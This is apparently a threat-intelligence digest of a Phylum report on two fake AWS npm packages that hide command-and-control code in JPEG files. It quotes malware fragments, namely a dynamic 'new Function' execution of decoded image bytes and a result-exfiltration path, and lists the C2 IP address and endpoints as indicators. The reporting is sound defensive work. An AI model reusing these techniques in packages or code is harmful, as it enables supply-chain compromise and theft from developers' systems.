Fake AWS Packages Ship Command and Control Malware In JPEG Files

Phylum reported malicious npm packages concealing a command-and-control payload inside JPEG files. The campaign decodes and executes code from images, registers with a remote C2 server, and periodically fetches commands from that server. #Phylum #img-aws-s3-object-multipart-copy #legacyaws-s3-object-multipart-copy #85.208.108.29 #cloudconvert

Keypoints

  • The incident involves two npm packages that appear legitimate but contain hidden C2 capabilities (img-aws-s3-object-multipart-copy and legacyaws-s3-object-multipart-copy).
  • Malicious code updates index.js to load and execute a new script loadformat.js that hides payloads inside image files.
  • loadformat.js analyzes image bytes and reconstructs executable code when enough “valid” bytes are found, using image data to trigger actions on the victim system.
  • The payload can register with a remote C2 server, periodically fetch commands, and execute them, sending results back to the attacker.
  • The C2 server communications use HTTPS and point to 85.208.108.29, with command/registration endpoints and data exfiltration paths.
  • Malicious packages persisted on npm for nearly two days after discovery, highlighting detection and response gaps in open-source ecosystems.

MITRE Techniques

  • [T1027.001] Steganography – Payload is embedded in images; “After reading the image file from the disk, each byte is analyzed. Any bytes with a value between 32 and 126 are converted from Unicode values into a character and appended to the analyzepixels variable.”
  • [T1059.007] JavaScript – The malware constructs code in imagebyte/analyzePixels and uses a dynamic function to execute it; “const func = new Function('https', 'exec', 'os', imagebyte); func(https, exec, os);”
  • [T1071.001] Application Layer Protocol: HTTPS – The malware communicates with C2 servers over HTTPS; “httpsOptions = { hostname: 'cloudconvert.com', path: '/image-converter', method: 'POST' }” and registration/command endpoints are used.
  • [T1041] Exfiltration Over C2 Channel – Results are posted back to the attacker; “path: '/post-result?clientId=' + encodeURIComponent(clientInfo.name)”
  • [T1195] Supply Chain – Malicious packages appear in open-source npm registry and were available for analysis; “these packages appear to be legitimate” and “the malicious packages remained available on npm for nearly two days.”

Indicators of Compromise

  • [IP] C2 server – 85.208.108.29 – used for client registration and command retrieval
  • [Domain] C2/command channel – cloudconvert.com – used in image-processing code path
  • [File] Dropped/appearing images – logo1.jpg, logo2.jpg, logo3.jpg – used to extract and execute code
  • [File] Malicious npm packages – img-aws-s3-object-multipart-copy, legacyaws-s3-object-multipart-copy
  • [Endpoint] C2 interactions – /register, /get-command?clientId=, /post-result?clientId=

Read more: https://blog.phylum.io/fake-aws-packages-ship-command-and-control-malware-in-jpeg-files/